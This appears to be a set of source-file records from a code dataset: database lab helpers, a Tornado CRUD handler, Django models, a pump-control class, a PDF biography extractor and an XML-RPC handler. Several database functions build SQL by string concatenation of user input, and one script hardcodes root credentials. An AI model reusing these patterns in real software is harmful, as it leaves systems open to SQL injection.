1]:\r\n splitted = line[:-1].split(' ')\r\n words.add(splitted[0])\r\n pos_tags.add(splitted[1])\r\n ner_tags.add(splitted[2])\r\n sentence.append((splitted[0], splitted[1], splitted[2]))\r\n sentences.append(sentence)\r\n return sentences, words, pos_tags, ner_tags\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n import os\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\n\r\n LSTM_CRF_Tagger_CoNLL2000(\r\n train_path='../../data/CoNLL-2000/train.txt',\r\n model_name='conll2000_mask_50',\r\n max_length=100,\r\n embedding_dim=20,\r\n epochs=50,\r\n batch_size=256,\r\n mask=True,\r\n n_gpu=2\r\n ).main(\r\n test_path='../../data/CoNLL-2000/test.txt'\r\n )\r\n","sub_path":"src/LSTM_CRF/lstm_crf_tagger_conll2000.py","file_name":"lstm_crf_tagger_conll2000.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"177836982","text":"import psycopg2\r\nimport os\r\n\r\nfrom sqlalchemy import insert as insert_\r\nfrom sqlalchemy import update as update_\r\nfrom sqlalchemy import delete as delete_\r\nfrom sqlalchemy import select as select_\r\nfrom sqlalchemy.exc import SQLAlchemyError\r\nfrom sqlalchemy.sql import text\r\nfrom sqlalchemy import inspect, Column, ForeignKey\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy import TypeDecorator, Date\r\n\r\n\r\nclass MyFancyType(TypeDecorator):\r\n impl = Date\r\n\r\n def process_literal_param(self, value, dialect):\r\n return \"'%s'\" % value\r\n\r\n\r\ndef select_table(engine):\r\n work_table = table_name = \"\"\r\n primary_key = pk = \"\"\r\n attributes = []\r\n # get all tables from database\r\n Base = declarative_base()\r\n inspector = inspect(engine)\r\n schemas = inspector.get_schema_names()\r\n schema = 'public'\r\n while True:\r\n os.system('cls')\r\n print(\"schema: %s\" % schema)\r\n print(\"Valide tables:\")\r\n for table_name in inspector.get_table_names(schema=schema):\r\n print(table_name)\r\n\r\n work_table = table_name = input(\"Input table you want work with:\")\r\n if table_name in inspector.get_table_names(schema=schema):\r\n break\r\n else:\r\n print(\"Input valid table\")\r\n fk = dict()\r\n for x in inspector.get_foreign_keys(table_name, schema=schema):\r\n fk[x['name']] = str(x[\"referred_table\"]) + \".\" + str(x['referred_columns']).strip('[]\\'')\r\n pk = inspector.get_pk_constraint(table_name, schema=schema)\r\n pk = str(pk['constrained_columns']).strip('[]\\'')\r\n d = dict()\r\n d['__tablename__'] = table_name\r\n for column in 
inspector.get_columns(table_name, schema=schema):\r\n print(str(column['type']))\r\n if str(column['type']) == 'DATE':\r\n d[column['name']] = Column(MyFancyType)\r\n attributes.append([str(column['name']), str('Date')])\r\n continue\r\n attributes.append([str(column['name']), str(column['type'])])\r\n if column['name'] == pk and column['name'] in fk:\r\n d[column['name']] = Column(ForeignKey(fk[column['name']]), type_=column['type'],\r\n nullable=column['nullable'], primary_key=True)\r\n elif str(column['name']) == pk:\r\n d[column['name']] = Column(type_=column['type'], nullable=column['nullable'], primary_key=True)\r\n elif column['name'] in fk:\r\n d[column['name']] = Column(ForeignKey(fk[column['name']]), type_=column['type'],\r\n nullable=column['nullable'])\r\n else:\r\n d[column['name']] = Column(type_=column['type'], nullable=column['nullable'])\r\n Test = type('Test', (Base,), d)\r\n return Test, table_name, pk, attributes\r\n\r\n\r\ndef insert(model, session, work_table, primary_key, attributes, data):\r\n d_ = dict()\r\n for iter, x in enumerate(attributes):\r\n if x[0] != primary_key:\r\n d_[x[0]] = data[iter]\r\n str_req = str(insert_(model).values(d_).compile(compile_kwargs={\"literal_binds\": True}))\r\n session.rollback()\r\n return str_req\r\n\r\n\r\ndef update(model, session, work_table, primary_key, attributes, data):\r\n d_ = dict()\r\n for iter, x in enumerate(attributes):\r\n d_[x[0]] = data[iter]\r\n str_req = str(update_(model).where(text(str(primary_key) + \"=\" + str(d_.pop(primary_key)))).values(d_).compile(\r\n compile_kwargs={\"literal_binds\": True}))\r\n session.rollback()\r\n return str_req\r\n\r\n\r\ndef delete(model, session, work_table, primary_key, todel):\r\n str_req = str(\r\n delete_(model).where(text(str(primary_key) + \"=\" + str(todel))).compile(compile_kwargs={\"literal_binds\": True}))\r\n session.rollback()\r\n return str_req\r\n\r\n\r\ndef insert_random(work_table, primary_key, attributes, num):\r\n # INSERT INTO public.\"Users\" (user_login, user_password, user_data) (\r\n # SELECT user_login, user_password, user_data\r\n # FROM (\r\n # SELECT (\r\n # SELECT array_to_string(ARRAY(SELECT chr((ascii('a') + round(random() * 25))::integer)\r\n # FROM generate_series(3, (random()*10)::integer + 3 + (generator*0))), '') as user_login\r\n # ) , (\r\n # SELECT md5((random()+ (generator*0))::text) as user_password\r\n # ) , (\r\n # SELECT timestamp '2019-02-10' + random() * (timestamp '2019-04-20' - timestamp '2019-02-10') as user_data\r\n # )\r\n # FROM generate_series(1,num) as generator\r\n # ) dont_argh_on_me_postgresql\r\n # ) ON CONFLICT DO NOTHING;\r\n\r\n req = \"INSERT INTO public.\\\"\" + str(work_table) + \"\\\" (\"\r\n # tag_id, ques_id\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][0] == primary_key:\r\n continue\r\n if added:\r\n req += \", \"\r\n req += attributes[i][0]\r\n added = True\r\n req += \") ( SELECT \"\r\n # tag_id, ques_id, test\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][0] == primary_key:\r\n continue\r\n if added:\r\n req += \", \"\r\n req += attributes[i][0]\r\n added = True\r\n req += \" FROM ( SELECT \"\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][0] == primary_key:\r\n continue\r\n if added:\r\n req += \", \"\r\n req += \"(\"\r\n if attributes[i][1] == \"INTEGER\":\r\n req += \"SELECT 1+RANDOM()*100::int + (generator*0) as \" + str(attributes[i][0]) + \" \"\r\n elif attributes[i][1] == \"TEXT\" and 
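Editor's note: `select_table` above rebuilds a declarative class column-by-column from the inspector. SQLAlchemy's automap extension performs the same reflection in a few lines — a sketch against an in-memory SQLite database so it runs as-is (the `prepare(autoload_with=...)` signature assumes SQLAlchemy 1.4+; the record's imports suggest an older API, so treat this as an alternative, not a drop-in):

```python
from sqlalchemy import create_engine, text
from sqlalchemy.ext.automap import automap_base

engine = create_engine("sqlite://")
with engine.begin() as conn:
    conn.execute(text("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT)"))

Base = automap_base()
Base.prepare(autoload_with=engine)     # reflect every table into a mapped class

Users = Base.classes.users
print(Users.__table__.columns.keys())  # ['id', 'login']
```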
attributes[i][0].find(\"password\") != -1:\r\n req += \"SELECT md5((random()+ (generator*0))::text) as \" + str(attributes[i][0]) + \" \"\r\n elif attributes[i][1] == \"TEXT\" and attributes[i][0].find(\"login\") != -1:\r\n req += \"SELECT array_to_string(ARRAY(SELECT chr((ascii('a') + round(random() * 25))::integer) \" \\\r\n \"FROM generate_series(3, (random()*10)::integer + 3 + (generator*0))), '') as \" + str(\r\n attributes[i][0]) + \" \"\r\n elif attributes[i][1] == \"CHAR(256)\" or attributes[i][1] == \"TEXT\":\r\n req += \"SELECT string_agg(substr(characters, (random() * length(characters) + 1 + (generator*0))::integer, 1), '') as \" + str(\r\n attributes[i][0])\r\n req += \" from (values('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 ')) as symbols(characters) \" \\\r\n \"join generate_series(1, 100+ (generator*0)) on 1 = 1 \"\r\n elif attributes[i][1] == \"Date\":\r\n req += \"SELECT timestamp '2019-02-10' + (random()+ (generator*0)) * (timestamp '2019-04-20' - timestamp '2019-02-10') as \" + str(\r\n attributes[i][0])\r\n req += \") \"\r\n added = True\r\n req += \"FROM generate_series(1,\" + str(\r\n num) + \") as generator ) dont_argh_on_me_postgresql ) ON CONFLICT DO NOTHING;\"\r\n return req\r\n\r\n\r\ndef select_complex(first, end, s_str):\r\n req = \"SELECT ques_text, ques_date, public.\\\"Users\\\".user_login, public.\\\"Answers\\\".answ_text, \" \\\r\n \" public.\\\"Answers\\\".answ_date, avg\" \\\r\n \" FROM public.\\\"Questions\\\"\" \\\r\n \" LEFT JOIN public.\\\"Answers\\\" ON public.\\\"Answers\\\".ques_id = public.\\\"Questions\\\".ques_id\" \\\r\n \" LEFT JOIN public.\\\"Users\\\" ON public.\\\"Answers\\\".user_id = public.\\\"Users\\\".user_id\" \\\r\n \" LEFT JOIN (SELECT answ_id, avg(rate_rate) FROM public.\\\"Rating\\\" GROUP BY answ_id) mq ON public.\\\"Answers\\\".answ_id=mq.answ_id\" \\\r\n \" WHERE avg BETWEEN \" + str(first) + \" AND \" + str(end) + \"AND public.\\\"Answers\\\".answ_text LIKE '%\" + s_str[\r\n 0] + \"%'\"\r\n for i in range(1, len(s_str)):\r\n req += \"OR public.\\\"Answers\\\".answ_text LIKE '%\" + s_str[i] + \"%'\"\r\n req += \";\"\r\n return req\r\n\r\n\r\ndef select_fts_phrase(work_table, primary_key, attributes, search_string):\r\n # SELECT ques_id, ques_text FROM public.\"Questions\"\r\n # WHERE to_tsvector(ques_text) @@ phraseto_tsquery('to go')\r\n\r\n req = \"SELECT \" + primary_key + \", \"\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][1] == \"TEXT\":\r\n if added:\r\n req += \", \"\r\n req += attributes[i][0]\r\n added = True\r\n req += \" FROM public.\\\"\" + work_table + \"\\\" WHERE to_tsvector(\"\r\n if len(search_string.split(\" \")) < 2:\r\n print(\"phrase is more that 2 word\")\r\n return\r\n for i in range(0, len(attributes)):\r\n if attributes[i][1] == \"TEXT\":\r\n req += attributes[i][0]\r\n req += \") @@ phraseto_tsquery('\" + search_string + \"');\"\r\n return req\r\n\r\n\r\ndef select_fts_word(work_table, primary_key, attributes, search_string):\r\n # SELECT ques_id, ques_text FROM public. \"Questions\" WHERE ques_text::tsvector @@ '! 
not'::tsquery\r\n\r\n req = \"SELECT \" + primary_key + \", \"\r\n added = False\r\n for i in range(0, len(attributes)):\r\n if attributes[i][1] == \"TEXT\":\r\n if added:\r\n req += \", \"\r\n req += attributes[i][0]\r\n added = True\r\n req += \" FROM public.\\\"\" + work_table + \"\\\" WHERE \"\r\n search_string = search_string.strip()\r\n ss = search_string.split(\" \")\r\n if len(ss) > 2:\r\n print(\"WORD\")\r\n return\r\n for i in range(0, len(attributes)):\r\n if attributes[i][1] == \"TEXT\":\r\n req += attributes[i][0]\r\n req += \"::tsvector @@ '! \" + search_string + \"'::tsquery;\"\r\n return req\r\n\r\n\r\ndef select_data(model, session, work_table, primary_key):\r\n # str_req = str(session.query(model).order_by(str(primary_key)).statement.compile(compile_kwargs={\"literal_binds\": True}))\r\n str_req = str(select_([model]).order_by(str(primary_key)).compile(compile_kwargs={\"literal_binds\": True}))\r\n session.rollback()\r\n return str_req\r\n\r\n\r\ndef execute_and_print(connection, cursor, req):\r\n try:\r\n cursor.execute(req)\r\n connection.commit()\r\n result = cursor.fetchall()\r\n return result\r\n except psycopg2.Error as error:\r\n if str(error) == 'no results to fetch':\r\n print(\"REQUEST SUCCESSFUL\")\r\n input()\r\n return \"OK\"\r\n else:\r\n print(\"ERROR:\", error)\r\n input()\r\n return \"\"\r\n","sub_path":"lab3/mvc.py","file_name":"mvc.py","file_ext":"py","file_size_in_byte":10296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"586852917","text":"\"\"\"\nEncapsulates decision making in the water-regulation module\n\"\"\"\n\n\nclass Decider():\n \"\"\"\n Encapsulates decision making in the water-regulation module\n \"\"\"\n\n def __init__(self, target_height, margin):\n \"\"\"\n Create a new decider instance for this tank.\n\n :param target_height: the target height for liquid in this tank\n :param margin: the margin of liquid above and below the target height for\n which the pump should not turn on. 
Ex: .05 represents a\n 5% margin above and below the target_height.\n \"\"\"\n self.target_height = target_height\n self.margin = margin\n self.upper = target_height + margin\n self.lower = target_height - margin\n\n\n def height_checker(self, cur_height):\n \"\"\"\n Checks current height to target height\n returns int whether current height is below, between, or above target height\n \"\"\"\n\n above = 2\n good = 1\n below = 0\n\n if cur_height < self.lower:\n return below\n if cur_height > self.upper:\n return above\n return good\n\n @staticmethod\n def decide_pump_action(current_action, actions):\n \"\"\"\n Closer function that returns an action based on the current status of pump and water level.\n \"\"\"\n\n def decide_level(current_height):\n \n if current_action == -1:\n if current_height == 0:\n return actions['PUMP_OFF']#PUMP_OUT and below\n return actions['PUMP_OUT'] #PUMP_OUT and in between or level or above level\n if current_action == 0: \n if current_height == 0:\n return actions['PUMP_IN']#PUMP_OFF and below\n if current_height == 2:\n return actions['PUMP_OUT'] #PUMP_OFF and above level\n return actions['PUMP_OFF'] #PUMP_OFF and in between level\n if current_action == 1:\n if current_height == 2:\n return actions['PUMP_OFF']#PUMP_IN and above\n return actions['PUMP_IN'] #PUMP_IN and either in between level or below min level\n\n return decide_level\n","sub_path":"students/SeanTasaki/Lesson06/water-regulation/waterregulation/decider.py","file_name":"decider.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"417874024","text":"from django.db import models\r\nfrom django.contrib.auth.models import AbstractUser\r\nfrom django.utils import timezone\r\n\r\n\r\nclass User(AbstractUser):\r\n gender_choice = (\r\n (0, '男'),\r\n (1, '女'),\r\n )\r\n occupation_choice = (\r\n ('administrator', '管理员'),\r\n ('artist', '艺术家'),\r\n ('educator', '教育家'),\r\n ('engineer', '工程师'),\r\n ('entertainment', '娱乐'),\r\n ('executive', '行政人员'),\r\n ('healthcare', '卫生保健'),\r\n ('homemaker', '家庭主妇'),\r\n ('lawyer', '律师'),\r\n ('librarian', '图书管理员'),\r\n ('marketing', '营销'),\r\n ('programmer', '程序员'),\r\n ('salesman', '推销员'),\r\n ('scientist', '科学家'),\r\n ('student', '学生'),\r\n ('technician', '技术员'),\r\n ('writer', '作家'),\r\n ('retired', '退休'),\r\n ('none', '自由人'),\r\n ('other', '其他'),\r\n )\r\n gender = models.BooleanField(choices=gender_choice, blank=True, default=0)\r\n email = models.EmailField('邮箱', unique=True, error_messages={'unique': \"该邮箱已被注册!\"})\r\n date_born = models.DateField(blank=True, default='1990-01-01')\r\n occupation = models.CharField(max_length=50, choices=occupation_choice, blank=True, default='other')\r\n is_newcomer = models.BooleanField(default=True)\r\n\r\n\r\nclass Movie(models.Model):\r\n title = models.CharField(max_length=150, blank=True)\r\n release_date = models.DateField(blank=True)\r\n genre = models.CharField(max_length=20, blank=True)\r\n imdb_url = models.URLField(blank=True)\r\n poster_url = models.URLField(blank=True)\r\n is_newcomer = models.BooleanField(default=True)\r\n\r\n\r\n#两个id外键分别是usr和movie\r\nclass Rating(models.Model):\r\n user_id = models.ForeignKey(User, on_delete=models.CASCADE)\r\n movie_id = models.ForeignKey(Movie, on_delete=models.CASCADE)\r\n rating = models.IntegerField(blank=True)\r\n eval_time = 
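# A usage sketch for the decide_pump_action closure above; the action codes
# (-1 pump out, 0 off, 1 pump in) and this actions dict are illustrative.
actions = {'PUMP_IN': 1, 'PUMP_OFF': 0, 'PUMP_OUT': -1}

decide = Decider.decide_pump_action(current_action=0, actions=actions)
assert decide(0) == actions['PUMP_IN']   # below the band while off: fill
assert decide(2) == actions['PUMP_OUT']  # above the band while off: drain
assert decide(1) == actions['PUMP_OFF']  # inside the band: stay off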
models.DateTimeField(default=timezone.now)\r\n\r\n\r\n","sub_path":"MovieRecommendGCMC/movierecommend/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"117329034","text":"import MySQLdb\n\ndb = MySQLdb.connect(\"localhost\", \"root\", '123456', \"python\")\ncursor = db.cursor()\n\ntry:\n sql = \"INSERT INTO SACH(NAME) VALUES ('CNTT')\"\n\n sql_update = \"UPDATE SACH SET NAME='%s'\" % 'TiengAnh'\n cursor.execute(sql)\n db.commit()\nexcept Exception as ex:\n print(ex)\n db.rollback()\ndb.close()\n\n# # execute SQL query using execute() method.\n# cursor.execute(\"SELECT * FROM SACH\")\n#\n# # Fetch a single row using fetchone() method.\n# data = cursor.fetchone()\n# print(data)\n","sub_path":"Bai2/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"332178506","text":"# Created by zhouwang on 2018/5/17.\n\nfrom .base import BaseRequestHandler, permission\nimport datetime\nimport os\n\ndef check_argements(handler, pk=None):\n error = {}\n path = os.path.join(handler.get_argument('path', ''), '')\n comment = handler.get_argument('comment', '')\n if not path:\n error['path'] = '目录路径是必填项'\n elif not os.path.exists(path):\n error['path'] = '目录路径[本地]不存在'\n elif not os.path.isdir(path):\n error['path'] = '路径不是一个目录'\n else:\n select_sql = 'SELECT id FROM local_log_dir WHERE path=\"%s\" %s' % (path, 'and id!=\"%d\"' % pk if pk else '')\n count = handler.mysqldb_cursor.execute(select_sql)\n if count:\n error['path'] = '目录路径已存在'\n if not comment:\n error['comment'] = '备注是必填项'\n request_data = {\n 'path':path,\n 'comment':comment\n }\n return error, request_data\n\n\ndef add_valid(func):\n def _wrapper(self):\n error, self.reqdata = check_argements(self)\n if error:\n return {'code': 400, 'msg': 'Bad POST data', 'error': error}\n return func(self)\n return _wrapper\n\n\ndef query_valid(func):\n def _wrapper(self, pk):\n error = {}\n if not pk and self.request.arguments:\n argument_keys = self.request.arguments.keys()\n query_keys = ['id', 'path', 'comment', 'create_time']\n error = {key:'参数不可用' for key in argument_keys if key not in query_keys}\n if error:\n return {'code': 400, 'msg': 'Bad GET param', 'error': error}\n return func(self, pk)\n return _wrapper\n\n\ndef update_valid(func):\n def _wrapper(self, pk):\n select_sql = 'SELECT id FROM local_log_dir WHERE id=\"%d\"' % pk\n count = self.mysqldb_cursor.execute(select_sql)\n if not count:\n return {'code': 404, 'msg': 'Update row not found'}\n error, self.reqdata = check_argements(self, pk)\n if error:\n return {'code': 400, 'msg': 'Bad PUT param', 'error': error}\n return func(self, pk)\n return _wrapper\n\n\ndef del_valid(func):\n def _wrapper(self, pk):\n select_sql = 'SELECT id FROM local_log_dir WHERE id=\"%d\"' % pk\n count = self.mysqldb_cursor.execute(select_sql)\n if not count:\n return {'code': 404, 'msg': 'Delete row not found'}\n return func(self, pk)\n return _wrapper\n\n\nclass LocalLogDir():\n def __init__(self):\n self.reqdata = {}\n\n @add_valid\n def _add(self):\n insert_sql = 'INSERT INTO local_log_dir (path, create_time, comment) VALUES (\"%s\", \"%s\", \"%s\")' % \\\n (self.reqdata['path'], datetime.datetime.now().strftime('%Y-%m-%d %H:%M'),\n self.reqdata['comment'],)\n try:\n self.mysqldb_cursor.execute(insert_sql)\n self.mysqldb_conn.commit()\n except Exception as e:\n 
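# The MySQLdb sample above interpolates values straight into SQL strings; a
# hedged sketch of the same statements with driver-side parameter binding,
# which escapes values and avoids SQL injection (connection details are
# placeholders).
import MySQLdb

db = MySQLdb.connect("localhost", "root", "123456", "python")
cursor = db.cursor()
try:
    cursor.execute("INSERT INTO SACH(NAME) VALUES (%s)", ("CNTT",))
    cursor.execute("UPDATE SACH SET NAME=%s", ("TiengAnh",))
    db.commit()
except Exception as ex:
    print(ex)
    db.rollback()
finally:
    db.close()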
self.mysqldb_conn.rollback()\n return {'code': 500, 'msg': 'Add failed, %s' % str(e)}\n else:\n self.mysqldb_cursor.execute('SELECT LAST_INSERT_ID() as id')\n return {'code': 200, 'msg': 'Add successful', 'data': self.mysqldb_cursor.fetchall()}\n\n\n @query_valid\n def _query(self, pk):\n select_sql = '''\n SELECT\n id,\n path, \n date_format(create_time, \"%%Y-%%m-%%d %%H:%%i:%%s\") as create_time,\n comment \n FROM local_log_dir\n %s\n ''' % self.format_where_param(pk, self.request.arguments)\n self.mysqldb_cursor.execute(select_sql)\n results = self.mysqldb_cursor.fetchall()\n data = [dict(result, **{'nodes':self._nodes(result['path']) if os.path.isdir(result['path']) else [] }) for result in results]\n return {'code': 200, 'msg': 'Query successful', 'data': data}\n\n\n @update_valid\n def _update(self, pk):\n update_sql = 'UPDATE local_log_dir SET path=\"%s\", comment=\"%s\" WHERE id=\"%d\"' % \\\n (self.reqdata['path'], self.reqdata['comment'], pk)\n try:\n self.mysqldb_cursor.execute(update_sql)\n self.mysqldb_conn.commit()\n except Exception as e:\n self.mysqldb_conn.rollback()\n return {'code': 500, 'msg': 'Update failed, %s' % str(e)}\n else:\n return {'code': 200, 'msg': 'Update successful', 'data': {'id': pk}}\n\n\n @del_valid\n def _del(self, pk):\n delete_sql = 'DELETE FROM local_log_dir WHERE id=\"%d\"' % pk\n try:\n self.mysqldb_cursor.execute(delete_sql)\n self.mysqldb_conn.commit()\n except Exception as e:\n self.mysqldb_conn.rollback()\n return {'code': 500, 'msg': 'Delete failed, %s' % str(e)}\n else:\n return {'code': 200, 'msg': 'Delete successful'}\n\n\n def _nodes(self, path):\n results = []\n list_names = os.listdir(path)\n for name in list_names:\n next_path = os.path.join(path, name)\n if os.path.isdir(next_path):\n results.append({'text': name, 'nodes': self._nodes(next_path)})\n else:\n results.append({'text': name})\n return results\n\n\n\nclass Handler(BaseRequestHandler, LocalLogDir):\n '''\n 本地日志目录 Handler\n '''\n @permission(role=2)\n def post(self):\n response_data = self._add()\n self._write(response_data)\n\n @permission(role=2)\n def put(self, pk=0):\n response_data = self._update(int(pk))\n self._write(response_data)\n\n @permission(role=2)\n def delete(self, pk=0):\n response_data = self._del(int(pk))\n self._write(response_data)\n\n @permission()\n def get(self, pk=0):\n response_data = self._query(int(pk))\n self._write(response_data)","sub_path":"handlers/local_log_dir.py","file_name":"local_log_dir.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"248375939","text":"import subprocess # 在python 中背景地跑shell 指令\nimport re # regular expression 的library\nimport sys\nimport json # 資料格式json 的library\nimport threading # 多線程平行化處理用\nfrom functools import reduce\n\ndef main():\n extract_catalog() # 將目錄部份轉成純文字檔儲存\n indexes = extract_indexes() # 將目錄的項目和對應頁數擷取出來\n biographies = set_biographies_schema(indexes) # 幫每個人物傳記做一個key-value形式的檔案型資料庫\n biographies_s = divide_n_parts(biographies, 4) # 切成n等分以便作平行化處理\n \n # Output\n output(biographies_s)\n \ndef extract_catalog():\n # 如同在shell, 命令pdfbox 將 社會與文化篇.pdf 的3~9頁轉成純文字檔儲存\n # subprocess.run 的參數是 list of strings without space\n subprocess.run('java -jar ./Tools/pdfbox-app-1.8.13.jar ExtractText -startPage 3 -endPage 9 ./DataBase/社會與文化篇.pdf ./DataBase/tmp/index.txt'.split()) # \n\ndef extract_indexes():\n with open('./DataBase/tmp/index.txt', 'r') as f:\n index_text = f.read()\n\n match_pairs = re.findall(r'^(\\w+ ?\\w+) 
? ?\\.+ (\\d\\d\\d)$', index_text, re.MULTILINE)\n # return [(\"項目\",\"起始頁數\"), (\"項目\",\"起始頁數\"),... . ]\n match_pairs = list(filter(lambda pair: 5 <= int(pair[1]) <= 361, match_pairs)) # 抓的index限制在其起始頁數在5~361之間\n match_pairs.append((\"第假章 最後墊底用\", \"363\"))\n\n return match_pairs\n\ndef set_biographies_schema(indexPair_s):\n biographies = []\n category = \"\" # 目前所在的類別 e.g.教育學術\n for (i, indexPair) in enumerate(indexPair_s):\n item, startPage = indexPair\n\n if re.fullmatch(r'^第\\w章 \\w+$', item): # 若此index的項目是類別\n category = item[4:]\n else: # 否則此index的項目就是人物\n name = item.replace(\" \",\"\") # 二字人名在目錄中會有全形空格在中間\n \n biography = {\n \"Name\" : name,\n \"Alias_s\" : [],\n # PDF、傳記相關\n \"Category\" : category,\n \"StartPage\" : int(startPage),\n \"EndPage\" : int(indexPair_s[i+1][1]) - 1, # 這個傳記的結尾頁數是下一個傳記的開頭頁數再減1\n \"Authors\" : [],\n \"Notes\" : \"\",\n \"Footnotes\" : [],\n # Summary\n \"Locations\" : [],\n \"Identities\" : [],\n \"ChronologicalTable\" : [],\n # 基本資訊\n \"Birth\" : \"\",\n \"Death\" : \"\",\n \"BirthPlace\" : \"\",\n \"Hometown\" : \"\"\n }\n biographies.append(biography)\n\n return biographies\n\ndef divide_n_parts(lst, n):\n return [lst[i::n] for i in range(n)]\n\n # [startIndex : endIndex : skip]\n\n # Example:\n # Divide [0, 1, 2, 3, 4, 5, 6, 7, 8 ,9, 10, 11, 12] into 3 parts\n # -> [[0, 3, 6, 9, 12], [1, 4, 7, 10], [2, 5, 8, 11]]\n\ndef output(biographies_s):\n all_biographies = reduce(lambda x,y: x + y, biographies_s) # 分開的part再次結合成一體,也就是list of 所有傳記\n\n threads = []\n # 為n個部分的傳記s各設一個thread來轉換並輸出txt檔\n for part_biographies in biographies_s:\n thread = threading.Thread(target=output_txts, args=[part_biographies])\n threads.append(thread)\n # 輸出所有傳記的資料庫(json形式保存)這項工作自己一個thread\n thread = threading.Thread(target=output_metaDatas, args=[all_biographies])\n threads.append(thread)\n\n # 讓所有thread開始跑\n for thread in threads:\n thread.start()\n\n # 所有thread都執行完畢後才讓你往下\n for thread in threads:\n thread.join()\n\n\ndef output_txts(biographies):\n for biography in biographies:\n name = biography[\"Name\"]\n # 從目錄掃出來的是字串,要轉成數字 # +20 是因為市誌一開始從羅馬數字開始,市誌第1頁其實是pdf的第21頁\n startPage = biography[\"StartPage\"] + 20 \n endPage = biography[\"EndPage\"] + 20\n\n command = 'java -jar ./Tools/pdfbox-app-1.8.13.jar ExtractText -startPage {} -endPage {} ./DataBase/社會與文化篇.pdf ./DataBase/raw_txt/{}-{}.txt'.format(str(startPage), str(endPage), str(biography[\"StartPage\"]), name)\n subprocess.run(command.split() )\n\ndef output_metaDatas(biographies):\n for biography in biographies:\n with open('./DataBase/metaData/{}-{}.json'.format(str(biography[\"StartPage\"]), biography[\"Name\"]), 'w') as f:\n json.dump(biography, f) # 把biography(dict type) 變成json 檔案儲存\n \nif __name__ == \"__main__\":\n main()\n \n","sub_path":"ConvertAndExtract.py","file_name":"ConvertAndExtract.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"331507503","text":"# coding: utf-8\nimport xml\n\nfrom django.http.response import HttpResponse\nfrom six.moves import xmlrpc_client\n\nfrom modernrpc.conf import settings\nfrom modernrpc.core import XMLRPC_PROTOCOL\nfrom modernrpc.exceptions import RPCParseError, RPCInvalidRequest, RPCInternalError\nfrom modernrpc.handlers.base import RPCHandler\n\n\nclass XMLRPCHandler(RPCHandler):\n\n protocol = XMLRPC_PROTOCOL\n\n def __init__(self, request, entry_point):\n super(XMLRPCHandler, self).__init__(request, entry_point)\n # Marshaller is used to dumps data into valid XML-RPC 
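# Quick check of the round-robin split performed by divide_n_parts above,
# together with the reduce() that output() uses to stitch the parts back.
from functools import reduce

parts = [list(range(13))[i::3] for i in range(3)]
assert parts == [[0, 3, 6, 9, 12], [1, 4, 7, 10], [2, 5, 8, 11]]
# The interleaving preserves membership but not the original order.
assert sorted(reduce(lambda x, y: x + y, parts)) == list(range(13))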
response. See self.dumps() for more info\n self.marshaller = xmlrpc_client.Marshaller(encoding=settings.MODERNRPC_XMLRPC_DEFAULT_ENCODING,\n allow_none=settings.MODERNRPC_XMLRPC_ALLOW_NONE)\n\n @staticmethod\n def valid_content_types():\n return [\n 'text/xml',\n ]\n\n def loads(self, str_data):\n try:\n try:\n # Python 3\n return xmlrpc_client.loads(str_data, use_builtin_types=settings.MODERNRPC_XMLRPC_USE_BUILTIN_TYPES)\n except TypeError:\n # Python 2\n return xmlrpc_client.loads(str_data, use_datetime=settings.MODERNRPC_XMLRPC_USE_BUILTIN_TYPES)\n\n except xml.parsers.expat.ExpatError as e:\n raise RPCParseError(e)\n\n except xmlrpc_client.ResponseError:\n raise RPCInvalidRequest('Bad XML-RPC payload')\n\n except Exception as e: # pragma: no cover\n raise RPCInvalidRequest(e)\n\n def dumps(self, obj):\n\n try:\n # Marshaller has a specific handling of Fault instance. It is given without modification\n if isinstance(obj, xmlrpc_client.Fault):\n return self.marshaller.dumps(obj)\n\n # xmlrpc_client.Marshaller expects a list of objects to dumps.\n # It will output a '' block and loops onto given objects to inject, for each one,\n # a 'X' block.\n # This is not the return defined in XML-RPC standard, see http://xmlrpc.scripting.com/spec.html:\n # \"The body of the response is a single XML structure, a , which can contain\n # a single which contains a single which contains a single .\"\n #\n # So, to make sure the return value always contain a single 'X',\n # we dumps it as an array of a single value.\n return self.marshaller.dumps([obj])\n\n except Exception as e:\n raise RPCInternalError('Unable to serialize result as valid XML: ' + str(e))\n\n def process_request(self):\n\n encoding = self.request.encoding or 'utf-8'\n data = self.request.body.decode(encoding)\n\n params, method_name = self.loads(data)\n\n if method_name is None:\n raise RPCInvalidRequest('Missing methodName')\n\n return self.execute_procedure(method_name, args=params)\n\n @staticmethod\n def xml_http_response(data, http_response_cls=HttpResponse):\n response = http_response_cls(data)\n response['Content-Type'] = 'text/xml'\n return response\n\n def result_success(self, data):\n\n raw_response = ''\n raw_response += ''\n raw_response += self.dumps(data)\n raw_response += ''\n\n return self.xml_http_response(raw_response)\n\n def result_error(self, exception, http_response_cls=HttpResponse):\n\n raw_response = ''\n raw_response += ''\n raw_response += self.dumps(xmlrpc_client.Fault(exception.code, exception.message))\n raw_response += ''\n\n return self.xml_http_response(raw_response, 